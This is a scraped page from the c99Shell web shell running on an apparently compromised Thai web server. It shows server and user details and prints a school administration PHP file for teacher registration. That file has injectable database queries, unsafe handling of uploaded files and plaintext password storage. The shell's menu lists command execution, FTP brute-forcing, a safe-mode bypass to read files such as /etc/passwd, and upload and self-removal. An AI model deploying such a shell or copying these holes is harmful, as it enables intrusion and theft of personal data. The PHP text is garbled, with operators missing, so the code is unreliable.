!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/admin/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertHistory.php (10.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
 session_start
();
if (
session_is_registered("valid_user"))
 {
include(
"../include/FunctionDB.php");
include(
"../include/Function.php");
ConnectDB();
$Flag true;
$First_name htmlspecialchars(trim($_POST[First_name]));
$Teacher_name htmlspecialchars(trim($_POST[Teacher_name]));
$Teacher_lastname htmlspecialchars(trim($_POST[Teacher_lastname]));
$Address =  htmlspecialchars(trim($_POST[Address]));
$Skill =  htmlspecialchars(trim($_POST[Skill]));
$DateBirth $_POST[mYear]."-".$_POST[mMonth]."-".$_POST[mDate];
$Type_degree1 =  htmlspecialchars(trim($_POST[Type_degree1]));
$Type_degree2 =  htmlspecialchars(trim($_POST[Type_degree2]));
$Type_degree3 =  htmlspecialchars(trim($_POST[Type_degree3]));
//$Teacher_id = $_POST[Id1]."-".$_POST[Id2]."-".$_POST[Id3]."-".$_POST[Id4];
$Teacher_id $_POST[Username];
$Sex  =  htmlspecialchars(trim($_POST[Sex]));
$Nationality htmlspecialchars(trim($_POST[Nationality]));
$Nation =  htmlspecialchars(trim($_POST[Nation]));
$Religion htmlspecialchars(trim($_POST[Religion]));
$Citizen_id htmlspecialchars(trim($_POST[Citizen_id]));
$Father_name htmlspecialchars(trim($_POST[Father_name]));
$Mother_name htmlspecialchars(trim($_POST[Mother_name]));
$Status =htmlspecialchars(trim($_POST[Status]));
$Status2 =htmlspecialchars(trim($_POST[Status2]));
$Status3 =htmlspecialchars(trim($_POST[Status3]));
$Soulmate htmlspecialchars(trim($_POST[Soulmate]));
$Total_child htmlspecialchars(trim($_POST[Total_child]));
$Type_Degree =  $_POST[Type_Degree];
$Degree_code $_POST[Degree_code];
$Club_nid $_POST[Club_nid];
$Skill htmlspecialchars(trim($_POST[Skill]));
$Gover_id $_POST[Gover_id]; 
$Forum_nid $_POST[Club_nid];
$Year_gov $_POST[Year_gov];   
$Year_coll $_POST[Year_coll]; 
$Year_fac $_POST[Year_fac]; 
$Gover_pos $_POST[Gover_pos]; 
$Manage_pos $_POST[Manage_pos]; 
$Faculty_code $_POST[Faculty_code]; 
$Group htmlspecialchars(trim($_POST[Group]));
$Username  $_POST[Username]; 
$Password $_POST[Password];

///////////////     Check Duplicate Teacher Id /////////////////////////////////////
/*echo " $Teacher_id <br>";
$sql3 = "Select * From teachertb Where Teacher_id='$Teacher_id'";
$result3 = mysql_query($sql3) or die("Error $result3".mysql_error());
$sum = mysql_num_rows($result3);
if ($sum>0)
{
$msg .="<li>รหัสอาจารย์ซ้ำ";
$button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}
//////////////////// check Status Personal Register
$sql2 ="Select * From accounttb Where Teacher_id = '$Teacher_id' ";
$result1 = mysql_query($sql2) or die("Error $result1 $sql2".mysql_error());
$row = mysql_num_rows($result1);
if ($row < 0)
{
$msg .="<li>Teacher id Incorrect";
$button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag = false;
}*/
////////////////////////// check First name 
if ($First_name =="")
{
$msg .="<li>กรุณาระบุ คำนำหน้า";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag false;
}
///////////////////// check name
if ($Teacher_name =="")
{
$msg .="<li>กรุณาระบุ ชื่อ";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag false;
}
/////////////////// Check Lastname
if ($Teacher_lastname =="")
{
$msg .="<li>กรุณาระบุ นามสกุล";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag false;
}
////////////////////////
if ( ! CheckLenght$Citizen_id,12 ) )
    {
        
$msg .= "<li>รหัสบัตรประชาชนต้องมีตั้งแต่ 13 หลัก";
        
$button "<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold; color:#FFF; background-color:#036; border-style:outset; border-color:#69F; font-family: Tahoma;\">";
        
$Flag false;
    }
///////////////////////  Check Address
if ($Address=="")
{
$msg .="<li>กรุณาระบุ ภูมิลำเนา";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag false;
}
//////////////////////// Check User //////////////////////
if ($Password != $_POST[Password1])
{
$msg .="<li>กรุณายืนยัน รหัสผ่าน";
$button ="<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
$Flag false;
}
/////////////////////////////////////
if ( ! CheckLenght($Password,6))
    {
        
$msg .= "<li>รหัสผ่านต้องมีตั้งแต่ 6-15 อักษร";
        
$button "<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold; color:#FFF; background-color:#036; border-style:outset; border-color:#69F; font-family: Tahoma;\">";
        
$Flag false;
    }
////////////////* ตรวจสอบว่า มีตัวอักษรอื่น ๆ นอกเนื่องจากตัวอักษรภาษาอังกฤษ และ ตัวเลขหรือไม่ */
if ( ! CheckEngNumAlpha($Password))
    {
        
$msg .= "<li>รหัสผ่านต้องเป็นอักษรภาษาอังกฤษ หรือ ตัวเลข เท่านั้น";
        
$button "<input type=\"button\" value=\"กลับไปแก้ไข\" onclick=\"window.history.back();\" style=\"font-weight:bold; color:#FFF; background-color:#036; border-style:outset; border-color:#69F; font-family: Tahoma;\">";
        
$Flag false;
    }

//--------------Check Status to Insert Data-----------------------//
   
if( $Flag)
    {
      
       
$Path "../personal_pic"
    if ( isset(
$Img1) )
    if (
copy($Img1,"$Path/$Img1_name")) 
       {
            
unlink ($Img1);
            
$Img1 "$Path/$Img1_name";
         }
        else
            echo
"Can't Copy";
     
$StatusId=1
     
$Priority 2;
     
$permission =2;
     
$PasswordR $Password;
     
$Password md5($Password);
       
          
InsertHistory ($collegeCode $officerId1$Acno $Teacher_id ,$First_name$Teacher_name ,$Teacher_lastname$DateBirth$Sex$Nationality$Nation$Religion$Citizen_id$Father_name$Mother_name$StatusId$Status,  $Status2$Status3$Soulmate$Total_child$Address $districtId$amphurId ,$provinceId$conId$Img1$Type_Degree  ,$Degree_code ,$Degree_else$Degree_His1$Degree_His1_Major$Degree_His1_Institute$Degree_His1_End_Year$Degree_His2$Degree_His2_Major$Degree_His2_Institute$Degree_His2_End_Year ,$Degree_His3$Degree_His3_Major$Degree_His3_Institute$Degree_His3_End_Year ,$Type_degree1 ,$Type_degree2 ,$Type_degree3 ,$Year_1$Year_2,$Year_3 ,$Person_type,$Teacher_type,$Gover_id,$Forum_nid ,$Club_nid,$Club_no,$Year_gov ,$Year_coll ,$Year_fac,$Gover_pos,$PositionId$Salary_1,$Salary_2,$Salary_3 ,$Date_gover ,$Absent_02$Absent_03$TeacherId$Propessnal$Absent_06$Manage_pos ,$Faculty_code$Dentis_code$Email $Username$Password ,$Flag_del ,$permission );
       
       
/*  
         InsertHistory($Teacher_id,$First_name,$Teacher_name,$Teacher_lastname,$DateBirth,$Sex, $Nationality,$Nation,$Religion,$Citizen_id,$Father_name,$Mother_name,$Status,$Status2,$Status3,$StatusId,$Soulmate,$Total_child,$Address,$districtId,$amphurId,$provinceId,$Img1,$Skill,$Type_Degree,$Degree_code,$Degree_else,$Degree_His1,$Degree_His1_Major,$Degree_His1_Institute,$Degree_His1_End_Year,$Degree_His2,$Degree_His2_Major,$Degree_His2_Institute,$Degree_His2_End_Year,$Degree_His3,$Degree_His3_Major,$Degree_His3_Institute,$Degree_His3_End_Year,$Type_degree1,$Salary_1, $Salary_2,$Salary_3,   $Type_degree2,$Type_degree3,$Year_1,$Year_2,$Year_3,$Person_type,$Teacher_type, $Gover_id,$Forum_nid,$Club_nid,$Year_gov,$Year_coll,$Year_fac,$Gover_pos, $Manage_pos, $Faculty_code,$Group,$Username,$Password,$Permission);
         */
    
    
$Teacher_code mysql_insert_id();
 
     
$Flag 1;
    
InsertUser($Teacher_code,$Username,$Password,$PasswordR,$Priority,$Flag);
          
$msg.="<li>คุณ<b> $Teacher_name $Teacher_lastname</b>";
          
$msg.="<li>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว";
          
$msg.="<li>ท่าน ควรยืนยันสิทธิการใช้งาน";
          
$button "<input type=\"reset\" value=\"Close Windows\" onclick=\"javascript:parent.close();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">";
              echo 
"<meta http-equiv=\"refresh\" content=\"1;URL=AccessList.php\">";
         
?>
         <table width="69%" border="0" align="center" cellpadding="0" cellspacing="0">

</table>
    <?php
    
}
    
CloseDB();
?>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<link href="../css/style1.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"marginwidth="0"marginheight="0">
<br>
  <table width="70%" border="0" cellspacing="0"cellpadding="2"align="center">
    <tr>
      <td><div align="center"><span><b><font color="#003399" size="4" face="Tahoma">::แบบฟอร์มกรอกข้อมูลประวัติ::</font></b></span></div></td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="1"cellpadding="0"align="center" class="table">
          <tr>
            
          <td bgcolor="#D7EBF4"><div align="center"><b><font color="#000000" size="2" face="Tahoma">ระบบแจ้งการทำงาน</font></b></div></td>
</tr>
<tr>
            <td bgcolor="#000000"> 
              <table width="90%" border="0" cellspacing="1"cellpadding="0"align="center">
              <tr>
<td><span><b><font color="#FFFFFF"><?php echo $msg;?></font></b></span></td>
</tr>
</table>
</td>
</tr>
<tr>
            
          <td bgcolor="#D7EBF4"> 
            <div align="center"><b><font color="#CCFF00"><?php echo $button;?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font size="2" face="Tahoma"></font></font></b></div></td>
</tr>
</table>
</td>
</tr>
</table>
  <br>

</body>
</html>
<?php 
    
}
else
{
    echo
"<body bgcolor=\"#CCCCCC\">";
     echo
"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
     echo
"<center>";
      echo
"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo
"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
      echo
"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> คุณไม่มีสิทธ์ใช้งาน</font>";
      echo
"</center>";
      echo
"</body>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0186 ]--